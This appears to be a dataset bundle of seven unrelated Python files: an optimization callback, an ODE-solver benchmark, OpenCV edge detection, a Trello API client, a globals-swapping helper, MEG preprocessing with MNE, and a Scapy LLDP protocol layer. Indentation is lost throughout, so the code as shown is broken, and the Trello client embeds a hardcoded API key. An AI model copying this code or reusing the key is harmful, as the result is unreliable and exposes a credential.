the-stack_106_22015
# ___________________________________________________________________________
#
# Pyomo: Python Optimization Modeling Objects
# Copyright 2017 National Technology and Engineering Solutions of Sandia, LLC
# Under the terms of Contract DE-NA0003525 with National Technology and
# Engineering Solutions of Sandia, LLC, the U.S. Government retains certain
# rights in this software.
# This software is distributed under the 3-clause BSD License.
# ___________________________________________________________________________
#@pyomobook:
def ph_rhosetter_callback(ph, scenario_tree, scenario):
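# Cost-proportional rho heuristic: each first-stage variable below gets a rho
# value proportional to its cost coefficient, scaled by MyRhoFactor * 0.001.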
MyRhoFactor = 1.0
root_node = scenario_tree.findRootNode()
si = scenario._instance
sm = si._ScenarioTreeSymbolMap
for i in si.ProductSizes:
ph.setRhoOneScenario(
root_node,
scenario,
sm.getSymbol(si.NumProducedFirstStage[i]),
si.UnitProductionCosts[i] * MyRhoFactor * 0.001)
for j in si.ProductSizes:
if j <= i:
ph.setRhoOneScenario(
root_node,
scenario,
sm.getSymbol(si.NumUnitsCutFirstStage[i,j]),
si.UnitReductionCost * MyRhoFactor * 0.001)
#@:pyomobook
the-stack_106_22016
import time
from collections import OrderedDict, namedtuple
import numpy as np
from pandas import DataFrame
from scipy.integrate import odeint, ode
import ggplot as gg
from scipy_ode import solve_ivp
HAS_ODES = False
try:
from scikits.odes.odeint import odeint as odes_odeint
from scikits.odes import ode as odes_ode
HAS_ODES = True
except ImportError:
pass
import egfngf_model
models = [
egfngf_model
]
class scipy_ode_int:
name = 'odeint'
def __call__(self, model, rtol):
def reordered_ode(t, y):
return model.f(y, t, model.k)
result = odeint(reordered_ode, model.y0, model.ts, rtol=rtol)
return result
class scipy_ode_class:
def __init__(self, name):
self.name = name
space_pos = name.find(" ")
if space_pos > -1:
self.solver = name[0:space_pos]
self.method = name[space_pos+1:]
else:
self.solver = name
self.method = None
def __call__(self, model, rtol):
def collected_ode(t, y):
return model.f(t, y, model.k)
solver = ode(collected_ode)
solver.set_integrator(self.solver, method=self.method, rtol=rtol,
atol=1e-6, nsteps=10000)
solver.set_initial_value(model.y0, 0.0)
result = np.empty((len(model.ts), len(model.y0)))
for i, t in enumerate(model.ts): # at t == 0, reuse the initial state instead of integrating
if t == 0:
result[i, :] = model.y0
continue
result[i, :] = solver.integrate(t)
return result
class scipy_odes_class(scipy_ode_class):
def __call__(self, model, rtol):
solver = odes_ode(self.solver, model.f_odes, old_api=False,
lmm_type=self.method, rtol=rtol,
atol=1e-6, user_data=model.k)
solution = solver.solve(model.ts, model.y0)
result = np.empty((len(model.ts), len(model.y0)))  # preallocate the output array
for i, t in enumerate(model.ts):
try:
result[i, :] = solution.values.y[i]
except Exception:
# no valid solution anymore
result[i, :] = 0
return result
class scipy_solver_class:
def __init__(self, name):
self.name = name
def __call__(self, model, rtol):
def combined_ode(t, y):
return model.f(t, y, model.k)
sol = solve_ivp(combined_ode, [0.0, np.max(model.ts)], model.y0, method=self.name, rtol=rtol, t_eval=model.ts)
return sol.y.transpose()
methods = [
scipy_ode_int(),
scipy_ode_class("vode bdf"),
scipy_ode_class("vode adams"),
scipy_ode_class("lsoda"),
scipy_ode_class("dopri5"),
scipy_ode_class("dop853"),
scipy_solver_class("RK45"),
scipy_solver_class("RK23"),
scipy_solver_class("Radau"),
scipy_solver_class("BDF"),
scipy_solver_class("LSODA"),
]
if HAS_ODES:
methods += [scipy_odes_class("cvode BDF"),
scipy_odes_class("cvode ADAMS"),
]
rtols = 10 ** np.arange(-9.0, 0.0)
GoldStandard = namedtuple('GoldStandard', ['name', 'values', 'max'])
gold_standards = []
for model in models:
print('Gold standard for {}'.format(model.name))
result = methods[0](model, 1e-12)
gold_standards.append((model.name, GoldStandard(model.name, result, np.max(result))))
gold_standards = OrderedDict(gold_standards)
data = []
for method in methods:
for model in models:
for rtol in rtols:
print('method: {} model: {} rtol: {}'.format(method.name, model.name, rtol), end='')
# Run
tic = time.time()
result = method(model, rtol)
toc = time.time() - tic
# Compare to gold standard
standard = gold_standards[model.name]
diff = result - standard.values
max_rel_diff = np.max(diff/standard.max)
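# Largest signed deviation from the gold standard, normalised by the gold
# standard's maximum value (a rough relative-error measure).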
# Append to table
record = (method.name, model.name, rtol, max_rel_diff, toc)
print(' err: {} toc: {}'.format(max_rel_diff, toc))
data.append(record)
data = DataFrame(data, columns=['method', 'model', 'rtol', 'err', 'time'])
print(gg.ggplot(data, gg.aes(x='err', y='time', color='method'))
+ gg.geom_point(size=60.0)
+ gg.geom_line()
+ gg.scale_x_log()
+ gg.scale_y_log()
+ gg.xlim(1e-10, 1e-2))
the-stack_106_22017
"""
For raspberry pi use:
import sys
sys.path.append('/home/pi/.local/lib/python3.9/site-packages')
"""
import cv2 as cv
import numpy as np
from PIL import Image, ImageEnhance
import time
import PRNTR
path1 = PRNTR.location
def ED():
#Canny edge detector
#load birds image
image = cv.imread("{}/files/new_test_resize.jpg".format(path1))
#convert to gray image
gray_image = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
#detect edges
canny_edges = cv.Canny(gray_image, 120, 150) #adjust the thresholds as needed to filter out the background
sobel_x_edges = cv.Sobel(gray_image, cv.CV_64F,1, 0)
sobel_y_edges = cv.Sobel(gray_image, cv.CV_64F,0, 1)
#convert all -ve pixels to positives
sobel_x_edges = np.uint8(np.absolute(sobel_x_edges))
sobel_y_edges = np.uint8(np.absolute(sobel_y_edges))
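#(Sketch, not part of the original pipeline) the two Sobel responses could be
#merged into a single edge map, e.g.:
#sobel_edges = cv.bitwise_or(sobel_x_edges, sobel_y_edges)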
#show edges
#cv.imshow("Canny Edges", canny_edges)
cv.imwrite("{}/files/Edgey.jpg".format(path1), canny_edges) #save the image file
#show images
#cv.imshow("Sobel X Edges", sobel_x_edges)
#cv.imshow("Sobel y Edges", sobel_y_edges)
#canny_edges.save('Canny_Edges.jpg')
#don't pass 0: cv.waitKey(0) blocks until a key press, which would hang the program and force you to terminate it manually.
cv.waitKey(1)
#cv.imwrite('sobel_x_edges', sobel_x_edges)
#cv.imwrite('sobel_y_edges', sobel_y_edges)
"""
#Laplacian edge detector
#detect gradients, edges
lap_edges = cv.Laplacian(gray_image, cv.CV_64F)
#convert all -ve pixels to positives
lap_edges = np.uint8(np.absolute(lap_edges))
cv.imshow("Laplacian Edges", lap_edges)
#cv.imwrite("{}/files/edgey2.jpg".format(path1), lap_edges) #save the image file but make sure to use the location you want to save it to.
cv.waitKey(0)
"""
if __name__ == '__main__':
ED()
the-stack_106_22019
import json
import re
import requests
from six.moves.urllib.parse import quote, quote_plus
from blackbelt.config import config
from blackbelt.errors import ConfigurationError
class Trello(object):
"""
I represent an authenticated connection to the Trello API.
Dispatch all requests to it through my methods.
My actions are named from the BlackBelt's POW; I don't aim to be a full,
usable client.
"""
API_KEY = "2e4bb3b8ec5fe2ff6c04bf659ee4553b"
APP_NAME = 'black-belt'
URL_PREFIX = "https://trello.com/1"
def __init__(self, access_token=None):
self._access_token = access_token
if not self._access_token and config.get('trello') and config['trello'].get('access_token'):
self._access_token = config['trello']['access_token']
### Infra
def do_request(self, url, method='get', data=None):
if not self._access_token:
raise ConfigurationError("Trying to talk to Trello without having access token")
url = self.URL_PREFIX + url
response = getattr(requests, method)(
url,
params={
'key': self.API_KEY,
'token': self._access_token
},
data=data
)
# try:
# print response.text
# except Exception:
# print 'Cannot print'
response.raise_for_status()
return json.loads(response.content)
def get_card_id(self, card_url):
# Trailing .* to accept long links as well. Brittle, but that's how they work
# See https://twitter.com/almadcz/status/537187876191350784
match = re.match(r"^https://trello.com/c/(?P<id>\w+)/?(.*)", card_url)
if match:
return match.groupdict()['id']
else:
return quote(card_url)
### Users & Tokens
def get_token_url(self, app_name, expires='30days'):
""" Return URL for retrieving access token """
return 'https://trello.com/1/authorize?key=%(key)s&name=%(name)s&expiration=%(expires)s&response_type=token&scope=%(scope)s' % {
'key': self.API_KEY,
'name': quote_plus(self.APP_NAME),
'expires': expires,
'scope': 'read,write'
}
def get_myself(self):
return self.do_request("/tokens/%s/member" % self._access_token)
def get_member(self, member_name):
return self.do_request("/members/%s" % member_name)
### Boards
def get_board(self, board_id):
return self.do_request("/boards/%s" % board_id)
### Columns
def get_columns(self, board_id):
return self.do_request("/boards/%s/lists" % board_id)
def get_column(self, column_id):
return self.do_request("/lists/%s" % column_id)
### Cards
def get_card(self, card_id=None, card_url=None):
if card_url and not card_id:
card_id = self.get_card_id(card_url)
return self.do_request("/cards/%s" % card_id)
def get_cards(self, column_id):
return self.do_request("/lists/%s/cards" % column_id)
def create_card(self, name, description, list_id):
return self.do_request(
'/cards',
method='post',
data={
'name': name,
'desc': description,
'idList': list_id
}
)
def move_card(self, card_id, board_id=None, column_id=None):
"""
Move card to the given column on another board.
If no column is given, it will be placed in the first one.
If no board is given, column is assumed to be on the same boards.
"""
if board_id:
self.do_request("/cards/%s/idBoard" % card_id, data={'value': board_id}, method='put')
if column_id:
self.do_request("/cards/%s/idList" % card_id, data={'value': column_id}, method='put')
def comment_card(self, card_id, comment):
self.do_request("/cards/%s/actions/comments" % card_id, method='post', data={'text': comment})
def add_card_member(self, card_id, member_id):
self.do_request(
"/cards/%s/members" % card_id,
method='post',
data={
'value': member_id
}
)
def label_card(self, card_id, label):
self.do_request(
"/cards/%s/labels" % card_id,
method='post',
data={
'value': label
}
)
### Checklists
def create_item(self, checklist_id, name, pos):
""" Create new item in the given checklist on given position """
return self.do_request(
url="/checklists/%s/checkItems" % checklist_id,
method='post',
data={
'name': name,
'pos': pos
}
)
def check_item(self, card_id, checklist_id, item_id):
""" Mark item in the given checklist as complete """
# OK, WTF
# This is kinda underdocumented, method is not present in API,
# but inspecting the requests in live trello says yes, they do
# https://trello.com/1/cards/5352e7118793950e77eb1c31/checklist/5352e75978962c0c7778f601/checkItem/5352fb5abb1fb4ca20b7be44
self.do_request(
"/cards/%(card_id)s/checklist/%(checklist_id)s/checkItem/%(item_id)s" % {
'checklist_id': checklist_id,
'item_id': item_id,
'card_id': card_id
},
method='put',
data={
'state': 'complete'
}
)
def get_card_checklists(self, card_id):
return self.do_request('/cards/%s/checklists' % card_id)
def get_checklist_items(self, checklist_id):
return self.do_request('/checklists/%s/checkItems' % checklist_id)
def delete_checklist_item(self, checklist_id, checklist_item_id):
return self.do_request(
"/checklists/%s/checkItems/%s" % (checklist_id, checklist_item_id),
method='delete'
)
def add_column(self, board_id, name, position):
""" Add position^th column to the board_id. Position is 1-indexed """
# Position is not just an integer as in 3 for 3rd from the left,
# but we ultimately want our API to look and act that way
# Therefore, find out position-1 & increment
columns = self.get_columns(board_id=board_id)
trello_position = 'bottom' # default
if len(columns) >= position - 1 and position > 1:
# -2: -1 for prev card, additional -1 because list is 0-indexed
# +1 for pos as we want to have it behind it
trello_position = columns[position - 2]['pos'] + 1
return self.do_request(
"/boards/%s/lists" % (board_id,),
method='post',
data={
'name': name,
'pos': trello_position
}
)
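# Example usage (sketch only; assumes a valid access token and an existing
# column id -- not part of the original module):
#
#   trello = Trello(access_token='<token>')
#   me = trello.get_myself()
#   card = trello.create_card('Review release notes', 'See checklist', '<column id>')
#   trello.comment_card(card['id'], 'Created via black-belt')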
the-stack_106_22020
from __future__ import print_function
class BoundObjAndStoredGlobals(object):
def __init__(self, obj, globals_, exclusions=None):
self.obj = obj
self.globals_ = globals_
self.exclusions = set(exclusions) if exclusions is not None else {'In', 'Out'}
self.exclusions.update(k for k in globals_ if k.startswith('_'))
def safe_keys(self):
return [k for k in self.globals_ if k not in self.exclusions]
def __enter__(self):
# store existing global variables
self.stored_globals = {}
for _k in self.safe_keys():
self.stored_globals[_k] = self.globals_[_k]
del self.globals_[_k]
# import the variables from obj
for _k in self.obj:
self.globals_[_k]= self.obj[_k]
return self
def __exit__(self, *args):
# update obj and remove the temporary global variables
for _k in self.safe_keys():
if self.globals_[_k] is not self:
self.obj[_k] = self.globals_[_k]
del self.globals_[_k]
# restore the stored global variables
for _k in self.stored_globals:
self.globals_[_k] = self.stored_globals[_k]
return
def __getattr__(self, attr):
return getattr(self.stored_globals, attr)
if __name__=='__main__':
d = dict(a=1, b=2, c=3)
print([k for k in globals().keys() if not k.startswith('_')])
print(d)
with BoundObjAndStoredGlobals(d, globals()) as context:
print(context.keys())
print([k for k in globals().keys() if not k.startswith('_')])
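# NOTE: `del k` below relies on Python 2 list-comprehension scoping, where the
# loop variable leaks into globals(); under Python 3 it would raise NameError.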
del k
d = 4 # noqa
e = b + c # noqa
print(d)
print([k for k in globals().keys() if not k.startswith('_')])
the-stack_106_22021
import mne
import os.path as op
from autoreject import get_rejection_threshold
subject = 'CC110037'
kind = 'rest'
raw = mne.io.read_raw_fif(
'/storage/local/camcan/data/'
'{0:s}/{1:s}/{2:s}_raw.fif'.format(subject, kind, kind))
mne.channels.fix_mag_coil_types(raw.info)
raw.info['bads'] = ['MEG1031', 'MEG1111', 'MEG1941']
sss_params_dir = '/storage/local/camcan/maxfilter'
cal = op.join(sss_params_dir, 'sss_params', 'sss_cal.dat')
ctc = op.join(sss_params_dir, 'sss_params', 'ct_sparse.fif')
raw = mne.preprocessing.maxwell_filter(
raw, calibration=cal,
cross_talk=ctc,
st_duration=10.,
st_correlation=.98,
destination=None,
coord_frame='head')
eog_epochs = mne.preprocessing.create_eog_epochs(raw)
if len(eog_epochs) >= 5:
reject_eog = get_rejection_threshold(eog_epochs, decim=8)
del reject_eog['eog'] # we don't want to reject eog based on eog.
else:
reject_eog = None
ecg_epochs = mne.preprocessing.create_ecg_epochs(raw)
if len(ecg_epochs) >= 5:
reject_ecg = get_rejection_threshold(ecg_epochs, decim=8)
# here we want the eog.
else:
reject_ecg = None
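# Too few EOG epochs: fall back to the ECG-derived thresholds computed above
# (this assumes reject_ecg is not also None).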
if reject_eog is None:
reject_eog = {k: v for k, v in
reject_ecg.items() if k != 'eog'}
proj_eog, _ = mne.preprocessing.compute_proj_eog(
raw, average=True, reject=reject_eog, n_mag=1, n_grad=1, n_eeg=1)
proj_ecg, _ = mne.preprocessing.compute_proj_ecg(
raw, average=True, reject=reject_ecg, n_mag=1, n_grad=1, n_eeg=1)
raw.add_proj(proj_eog)
raw.add_proj(proj_ecg)
the-stack_106_22023
# scapy.contrib.description = Link Layer Discovery Protocol (LLDP)
# scapy.contrib.status = loads
"""
LLDP - Link Layer Discovery Protocol
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:author: Thomas Tannhaeuser, [email protected]
:license: GPLv2
This module is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This module is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
:description:
This module provides Scapy layers for the LLDP protocol.
normative references:
- IEEE 802.1AB 2016 - LLDP protocol, topology and MIB description
:TODO:
- | organization specific TLV e.g. ProfiNet
| (see LLDPDUGenericOrganisationSpecific for a starting point)
- Ignore everything after EndofLLDPDUTLV
:NOTES:
- you can find the layer configuration options at the end of this file
- default configuration enforces standard conform:
* | frame structure
| (ChassisIDTLV/PortIDTLV/TimeToLiveTLV/...)
* multiplicity of TLVs (if given by the standard)
* min sizes of strings used by the TLVs
- conf.contribs['LLDP'].strict_mode_disable() -> disable strict mode
"""
from scapy.config import conf
from scapy.error import Scapy_Exception
from scapy.layers.l2 import Ether, Dot1Q
from scapy.fields import MACField, IPField, BitField, \
StrLenField, ByteEnumField, BitEnumField, \
EnumField, ThreeBytesField, BitFieldLenField, \
ShortField, XStrLenField, ByteField, ConditionalField, \
MultipleTypeField
from scapy.packet import Packet, bind_layers
from scapy.modules.six.moves import range
from scapy.data import ETHER_TYPES
from scapy.compat import orb
LLDP_NEAREST_BRIDGE_MAC = '01:80:c2:00:00:0e'
LLDP_NEAREST_NON_TPMR_BRIDGE_MAC = '01:80:c2:00:00:03'
LLDP_NEAREST_CUSTOMER_BRIDGE_MAC = '01:80:c2:00:00:00'
LLDP_ETHER_TYPE = 0x88cc
ETHER_TYPES[LLDP_ETHER_TYPE] = 'LLDP'
class LLDPInvalidFrameStructure(Scapy_Exception):
"""
basic frame structure not standard conform
(missing TLV, invalid order or multiplicity)
"""
pass
class LLDPMissingLowerLayer(Scapy_Exception):
"""
first layer below first LLDPDU must be Ethernet or Dot1q
"""
pass
class LLDPInvalidTLVCount(Scapy_Exception):
"""
invalid number of entries for a specific TLV type
"""
pass
class LLDPInvalidLengthField(Scapy_Exception):
"""
invalid value of length field
"""
pass
class LLDPDU(Packet):
"""
base class for all LLDP data units
"""
TYPES = {
0x00: 'end of LLDPDU',
0x01: 'chassis id',
0x02: 'port id',
0x03: 'time to live',
0x04: 'port description',
0x05: 'system name',
0x06: 'system description',
0x07: 'system capabilities',
0x08: 'management address',
range(0x09, 0x7e): 'reserved - future standardization',
127: 'organisation specific TLV'
}
DOT1Q_HEADER_LEN = 4
ETHER_HEADER_LEN = 14
ETHER_FSC_LEN = 4
ETHER_FRAME_MIN_LEN = 64
LAYER_STACK = []
LAYER_MULTIPLICITIES = {}
def guess_payload_class(self, payload):
# the TLV type occupies the upper 7 bits of the first octet; the low bit
# belongs to the 9-bit length field, so shift right by one (// 2) to get the type
try:
lldpdu_tlv_type = orb(payload[0]) // 2
return LLDPDU_CLASS_TYPES.get(lldpdu_tlv_type, conf.raw_layer)
except IndexError:
return conf.raw_layer
@staticmethod
def _dot1q_headers_size(layer):
"""
calculate size of lower dot1q layers (if present)
:param layer: the layer to start at
:return: size of vlan headers, layer below lowest vlan header
"""
vlan_headers_size = 0
under_layer = layer
while under_layer and isinstance(under_layer, Dot1Q):
vlan_headers_size += LLDPDU.DOT1Q_HEADER_LEN
under_layer = under_layer.underlayer
return vlan_headers_size, under_layer
def post_build(self, pkt, pay):
under_layer = self.underlayer
if under_layer is None:
if conf.contribs['LLDP'].strict_mode():
raise LLDPMissingLowerLayer('No lower layer (Ethernet '
'or Dot1Q) provided.')
else:
return pkt + pay
if isinstance(under_layer, LLDPDU):
return pkt + pay
frame_size, under_layer = LLDPDU._dot1q_headers_size(under_layer)
if not under_layer or not isinstance(under_layer, Ether):
if conf.contribs['LLDP'].strict_mode():
raise LLDPMissingLowerLayer('No Ethernet layer provided.')
else:
return pkt + pay
frame_size += LLDPDU.ETHER_HEADER_LEN
frame_size += len(pkt) + len(pay) + LLDPDU.ETHER_FSC_LEN
if frame_size < LLDPDU.ETHER_FRAME_MIN_LEN:
return pkt + pay + b'\x00' * (LLDPDU.ETHER_FRAME_MIN_LEN - frame_size) # noqa: E501
return pkt + pay
@staticmethod
def _frame_structure_check(structure_description):
"""
check if the structure of the frame is conform to the basic
frame structure defined by the standard
:param structure_description: string-list reflecting LLDP-msg structure
"""
standard_frame_structure = [LLDPDUChassisID.__name__,
LLDPDUPortID.__name__,
LLDPDUTimeToLive.__name__,
'<...>']
if len(structure_description) < 3:
raise LLDPInvalidFrameStructure(
'Invalid frame structure.\ngot: {}\nexpected: '
'{}'.format(' '.join(structure_description),
' '.join(standard_frame_structure)))
for idx, layer_name in enumerate(standard_frame_structure):
if layer_name == '<...>':
break
if layer_name != structure_description[idx]:
raise LLDPInvalidFrameStructure(
'Invalid frame structure.\ngot: {}\nexpected: '
'{}'.format(' '.join(structure_description),
' '.join(standard_frame_structure)))
@staticmethod
def _tlv_multiplicities_check(tlv_type_count):
"""
check if multiplicity of present TLVs conforms to the standard
:param tlv_type_count: dict mapping TLV type name to its count
"""
# * : 0..n, 1 : one and only one.
standard_multiplicities = {
LLDPDUEndOfLLDPDU.__name__: '*',
LLDPDUChassisID.__name__: 1,
LLDPDUPortID.__name__: 1,
LLDPDUTimeToLive.__name__: 1,
LLDPDUPortDescription.__name__: '*',
LLDPDUSystemName.__name__: '*',
LLDPDUSystemDescription.__name__: '*',
LLDPDUSystemCapabilities.__name__: '*',
LLDPDUManagementAddress.__name__: '*'
}
for tlv_type_name in standard_multiplicities:
standard_tlv_multiplicity = \
standard_multiplicities[tlv_type_name]
if standard_tlv_multiplicity == '*':
continue
try:
if tlv_type_count[tlv_type_name] != standard_tlv_multiplicity:
raise LLDPInvalidTLVCount(
'Invalid number of entries for TLV type '
'{} - expected {} entries, got '
'{}'.format(tlv_type_name,
standard_tlv_multiplicity,
tlv_type_count[tlv_type_name]))
except KeyError:
raise LLDPInvalidTLVCount('Missing TLV layer of type '
'{}.'.format(tlv_type_name))
def pre_dissect(self, s):
if conf.contribs['LLDP'].strict_mode():
if self.__class__.__name__ == 'LLDPDU':
LLDPDU.LAYER_STACK = []
LLDPDU.LAYER_MULTIPLICITIES = {}
else:
LLDPDU.LAYER_STACK.append(self.__class__.__name__)
try:
LLDPDU.LAYER_MULTIPLICITIES[self.__class__.__name__] += 1
except KeyError:
LLDPDU.LAYER_MULTIPLICITIES[self.__class__.__name__] = 1
return s
def dissection_done(self, pkt):
if self.__class__.__name__ == 'LLDPDU' and \
conf.contribs['LLDP'].strict_mode():
LLDPDU._frame_structure_check(LLDPDU.LAYER_STACK)
LLDPDU._tlv_multiplicities_check(LLDPDU.LAYER_MULTIPLICITIES)
super(LLDPDU, self).dissection_done(pkt)
def _check(self):
"""Overwrited by LLDPU objects"""
pass
def post_dissect(self, s):
self._check()
return super(LLDPDU, self).post_dissect(s)
def do_build(self):
self._check()
return super(LLDPDU, self).do_build()
def _ldp_id_adjustlen(pkt, x):
"""Return the length of the `id` field,
according to its real encoded type"""
f, v = pkt.getfield_and_val('id')
length = f.i2len(pkt, v) + 1
if (isinstance(pkt, LLDPDUPortID) and pkt.subtype == 0x4) or \
(isinstance(pkt, LLDPDUChassisID) and pkt.subtype == 0x5):
# Take the ConditionalField into account
length += 1
return length
class LLDPDUChassisID(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.2 / p. 26
"""
LLDP_CHASSIS_ID_TLV_SUBTYPES = {
0x00: 'reserved',
0x01: 'chassis component',
0x02: 'interface alias',
0x03: 'port component',
0x04: 'MAC address',
0x05: 'network address',
0x06: 'interface name',
0x07: 'locally assigned',
range(0x08, 0xff): 'reserved'
}
SUBTYPE_RESERVED = 0x00
SUBTYPE_CHASSIS_COMPONENT = 0x01
SUBTYPE_INTERFACE_ALIAS = 0x02
SUBTYPE_PORT_COMPONENT = 0x03
SUBTYPE_MAC_ADDRESS = 0x04
SUBTYPE_NETWORK_ADDRESS = 0x05
SUBTYPE_INTERFACE_NAME = 0x06
SUBTYPE_LOCALLY_ASSIGNED = 0x07
fields_desc = [
BitEnumField('_type', 0x01, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='id',
adjust=lambda pkt, x: _ldp_id_adjustlen(pkt, x)),
ByteEnumField('subtype', 0x00, LLDP_CHASSIS_ID_TLV_SUBTYPES),
ConditionalField(
ByteField('family', 0),
lambda pkt: pkt.subtype == 0x05
),
MultipleTypeField([
(
MACField('id', None),
lambda pkt: pkt.subtype == 0x04
),
(
IPField('id', None),
lambda pkt: pkt.subtype == 0x05
),
], StrLenField('id', '', length_from=lambda pkt: 0 if pkt._length is
None else pkt._length - 1)
)
]
def _check(self):
"""
run layer specific checks
"""
if conf.contribs['LLDP'].strict_mode() and not self.id:
raise LLDPInvalidLengthField('id must be >= 1 characters long')
class LLDPDUPortID(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.3 / p. 26
"""
LLDP_PORT_ID_TLV_SUBTYPES = {
0x00: 'reserved',
0x01: 'interface alias',
0x02: 'port component',
0x03: 'MAC address',
0x04: 'network address',
0x05: 'interface name',
0x06: 'agent circuit ID',
0x07: 'locally assigned',
range(0x08, 0xff): 'reserved'
}
SUBTYPE_RESERVED = 0x00
SUBTYPE_INTERFACE_ALIAS = 0x01
SUBTYPE_PORT_COMPONENT = 0x02
SUBTYPE_MAC_ADDRESS = 0x03
SUBTYPE_NETWORK_ADDRESS = 0x04
SUBTYPE_INTERFACE_NAME = 0x05
SUBTYPE_AGENT_CIRCUIT_ID = 0x06
SUBTYPE_LOCALLY_ASSIGNED = 0x07
fields_desc = [
BitEnumField('_type', 0x02, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='id',
adjust=lambda pkt, x: _ldp_id_adjustlen(pkt, x)),
ByteEnumField('subtype', 0x00, LLDP_PORT_ID_TLV_SUBTYPES),
ConditionalField(
ByteField('family', 0),
lambda pkt: pkt.subtype == 0x04
),
MultipleTypeField([
(
MACField('id', None),
lambda pkt: pkt.subtype == 0x03
),
(
IPField('id', None),
lambda pkt: pkt.subtype == 0x04
),
], StrLenField('id', '', length_from=lambda pkt: 0 if pkt._length is
None else pkt._length - 1)
)
]
def _check(self):
"""
run layer specific checks
"""
if conf.contribs['LLDP'].strict_mode() and not self.id:
raise LLDPInvalidLengthField('id must be >= 1 characters long')
class LLDPDUTimeToLive(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.4 / p. 29
"""
fields_desc = [
BitEnumField('_type', 0x03, 7, LLDPDU.TYPES),
BitField('_length', 0x02, 9),
ShortField('ttl', 20)
]
def _check(self):
"""
run layer specific checks
"""
if conf.contribs['LLDP'].strict_mode() and self._length != 2:
raise LLDPInvalidLengthField('length must be 2 - got '
'{}'.format(self._length))
class LLDPDUEndOfLLDPDU(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.1 / p. 26
"""
fields_desc = [
BitEnumField('_type', 0x00, 7, LLDPDU.TYPES),
BitField('_length', 0x00, 9),
]
def extract_padding(self, s):
return '', s
def _check(self):
"""
run layer specific checks
"""
if conf.contribs['LLDP'].strict_mode() and self._length != 0:
raise LLDPInvalidLengthField('length must be 0 - got '
'{}'.format(self._length))
class LLDPDUPortDescription(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.5 / p. 29
"""
fields_desc = [
BitEnumField('_type', 0x04, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='description'),
StrLenField('description', '', length_from=lambda pkt: pkt._length)
]
class LLDPDUSystemName(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.6 / p. 30
"""
fields_desc = [
BitEnumField('_type', 0x05, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='system_name'),
StrLenField('system_name', '', length_from=lambda pkt: pkt._length)
]
class LLDPDUSystemDescription(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.7 / p. 31
"""
fields_desc = [
BitEnumField('_type', 0x06, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='description'),
StrLenField('description', '', length_from=lambda pkt: pkt._length)
]
class LLDPDUSystemCapabilities(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.8 / p. 31
"""
fields_desc = [
BitEnumField('_type', 0x07, 7, LLDPDU.TYPES),
BitFieldLenField('_length', 4, 9),
BitField('reserved_5_available', 0, 1),
BitField('reserved_4_available', 0, 1),
BitField('reserved_3_available', 0, 1),
BitField('reserved_2_available', 0, 1),
BitField('reserved_1_available', 0, 1),
BitField('two_port_mac_relay_available', 0, 1),
BitField('s_vlan_component_available', 0, 1),
BitField('c_vlan_component_available', 0, 1),
BitField('station_only_available', 0, 1),
BitField('docsis_cable_device_available', 0, 1),
BitField('telephone_available', 0, 1),
BitField('router_available', 0, 1),
BitField('wlan_access_point_available', 0, 1),
BitField('mac_bridge_available', 0, 1),
BitField('repeater_available', 0, 1),
BitField('other_available', 0, 1),
BitField('reserved_5_enabled', 0, 1),
BitField('reserved_4_enabled', 0, 1),
BitField('reserved_3_enabled', 0, 1),
BitField('reserved_2_enabled', 0, 1),
BitField('reserved_1_enabled', 0, 1),
BitField('two_port_mac_relay_enabled', 0, 1),
BitField('s_vlan_component_enabled', 0, 1),
BitField('c_vlan_component_enabled', 0, 1),
BitField('station_only_enabled', 0, 1),
BitField('docsis_cable_device_enabled', 0, 1),
BitField('telephone_enabled', 0, 1),
BitField('router_enabled', 0, 1),
BitField('wlan_access_point_enabled', 0, 1),
BitField('mac_bridge_enabled', 0, 1),
BitField('repeater_enabled', 0, 1),
BitField('other_enabled', 0, 1),
]
def _check(self):
"""
run layer specific checks
"""
if conf.contribs['LLDP'].strict_mode() and self._length != 4:
raise LLDPInvalidLengthField('length must be 4 - got '
'{}'.format(self._length))
class LLDPDUManagementAddress(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.9 / p. 32
currently only 0x00..0x1e are used by standards, no way to
use anything > 0xff as management address subtype is only
one octet wide
see https://www.iana.org/assignments/address-family-numbers/address-family-numbers.xhtml # noqa: E501
"""
IANA_ADDRESS_FAMILY_NUMBERS = {
0x00: 'other',
0x01: 'IPv4',
0x02: 'IPv6',
0x03: 'NSAP',
0x04: 'HDLC',
0x05: 'BBN',
0x06: '802',
0x07: 'E.163',
0x08: 'E.164',
0x09: 'F.69',
0x0a: 'X.121',
0x0b: 'IPX',
0x0c: 'Appletalk',
0x0d: 'Decnet IV',
0x0e: 'Banyan Vines',
0x0f: 'E.164 with NSAP',
0x10: 'DNS',
0x11: 'Distinguished Name',
0x12: 'AS Number',
0x13: 'XTP over IPv4',
0x14: 'XTP over IPv6',
0x15: 'XTP native mode XTP',
0x16: 'Fiber Channel World-Wide Port Name',
0x17: 'Fiber Channel World-Wide Node Name',
0x18: 'GWID',
0x19: 'AFI for L2VPN',
0x1a: 'MPLS-TP Section Endpoint ID',
0x1b: 'MPLS-TP LSP Endpoint ID',
0x1c: 'MPLS-TP Pseudowire Endpoint ID',
0x1d: 'MT IP Multi-Topology IPv4',
0x1e: 'MT IP Multi-Topology IPv6'
}
SUBTYPE_MANAGEMENT_ADDRESS_OTHER = 0x00
SUBTYPE_MANAGEMENT_ADDRESS_IPV4 = 0x01
SUBTYPE_MANAGEMENT_ADDRESS_IPV6 = 0x02
